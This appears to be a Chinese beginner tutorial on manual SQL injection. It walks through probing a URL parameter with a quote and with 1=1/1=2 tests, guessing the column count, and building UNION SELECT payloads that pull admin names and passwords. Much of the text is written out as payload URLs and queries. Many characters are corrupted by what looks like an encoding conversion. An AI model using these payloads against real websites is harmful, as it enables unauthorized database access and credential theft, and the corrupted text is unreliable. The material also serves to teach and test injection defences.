假設(shè)的目標(biāo)網(wǎng)站 http://www.2cto.com /info.php?articleid=123(實(shí)際不可注入)

當(dāng)articleid 變量取值為123 時(shí)，我們假設(shè)一下在服務(wù)器中會(huì)有怎樣的代碼運(yùn)行?

1. SELECT * /* Select 函數(shù)讀取信息*/

2. FROM infotable /* 從products 數(shù)據(jù)表中*/

3. WHERE id='123';/* false condition 滿足條件時(shí)*/

/*XXXX*/是注釋符號(hào)，當(dāng)程序運(yùn)行時(shí)，/**/和中間的部分計(jì)算機(jī)會(huì)自動(dòng)忽略。

實(shí)際系統(tǒng)執(zhí)行的代碼是這樣的：

1. select * from infotable where id = '123';

在這里，id 的取值是通過(guò)url 取值得來(lái)的“123”，那么如果我這樣呢：

info.php?articleid=123'

后面多了一個(gè)單引號(hào)，那么比較一下系統(tǒng)原本執(zhí)行的語(yǔ)句有什么變化：

1. select * from infotable where id = 123;

2. select * from infotable where id = 123';

***多了一個(gè)引號(hào)，語(yǔ)法錯(cuò)誤。

注：計(jì)算機(jī)編程得不到想要的結(jié)果，錯(cuò)誤分兩種，一種是語(yǔ)法錯(cuò)誤，一種是邏輯錯(cuò)誤。后面認(rèn)真閱讀你會(huì)慢慢明白區(qū)別開(kāi)的，這也就是為什么判斷是否為注入點(diǎn)的***步要在網(wǎng)址后面加單引號(hào)的原因了(加單引號(hào)出錯(cuò)不能確定網(wǎng)址為注入點(diǎn)，只是判斷的一個(gè)步驟而已），于是后面的1=1 和1=2 的目的也就清楚了。

1. select * from infotable where id = 123;

2. select * from infotable where id = 123 and 1 = 1;//事實(shí)上1 就是1，所以應(yīng)該

返回正常頁(yè)面

3. select * from infotable where id = 123 and 1 = 2;//事實(shí)上，計(jì)算機(jī)中1 永遠(yuǎn)也不等于2，發(fā)生邏輯錯(cuò)誤，所以返回錯(cuò)誤頁(yè)面。手工注入通常會(huì)使用聯(lián)合查詢函數(shù)union 下面講一下union 的用法。

union 注入的***步通常是猜字段數(shù)。假設(shè)注入點(diǎn)是新聞頁(yè)面，那么頁(yè)面中執(zhí)行的SQL 語(yǔ)句就是：

1. select title,date,author,news,comm from news where id = 12;

當(dāng)你進(jìn)行union 注入的時(shí)候，union 前面的語(yǔ)句和union 后面的語(yǔ)句，都是一個(gè)完整的SQL

語(yǔ)句，是可以單獨(dú)執(zhí)行的語(yǔ)句

但是，必須保證前后的字段數(shù)相同，例如上面這個(gè)語(yǔ)句

1. select title,date,author,news,comm from news where id = 12;

2. select title,date,author,news,comm from news where id = 12 union select

name,password,3,4,5 from admin;

3. //news 是新聞表段，admin 是管理員信息表段

4. //管理員信息表段明顯沒(méi)有union 前面news 表段里面包含的字段數(shù)多所以使用數(shù)字3 到5 替代，數(shù)字無(wú)固定格式，可以使1 2 和3，也可以是111111 和4435435或者干脆用null 空來(lái)代替。

所以，上面的注入語(yǔ)句在實(shí)際中就是這么構(gòu)造：

1. info.php?id=12+union+select+name,password,3,4,5+from+admin

2. //SQL 注入中，加號(hào)用來(lái)代表空格的意思，因?yàn)橛行g覽器會(huì)自動(dòng)將空格轉(zhuǎn)換成%20，

如果union 前面是5 個(gè)，而union 后面不是5 個(gè)，則會(huì)發(fā)生邏輯錯(cuò)誤，顯示錯(cuò)誤頁(yè)面。

由于程序員編寫(xiě)的程序我們并不知道他在數(shù)據(jù)庫(kù)中設(shè)置了幾個(gè)字段，所以通常我們都是先進(jìn)行字段數(shù)的猜測(cè)，也就是：

1. info.php?id=12+union+select+1

2. info.php?id=12+union+select+1,2

3. info.php?id=12+union+select+1,2,3

4. info.php?id=12+union+select+1,2,3,4

5. info.php?id=12+union+select+1,2,3,4,5

6. //你也可以用order by 來(lái)猜，用法可以自己搜一下

一直這樣猜到正確頁(yè)面出來(lái)，沒(méi)有了邏輯錯(cuò)誤，也就表示字段數(shù)一致了，然后……后面……

這里僅僅提供思路。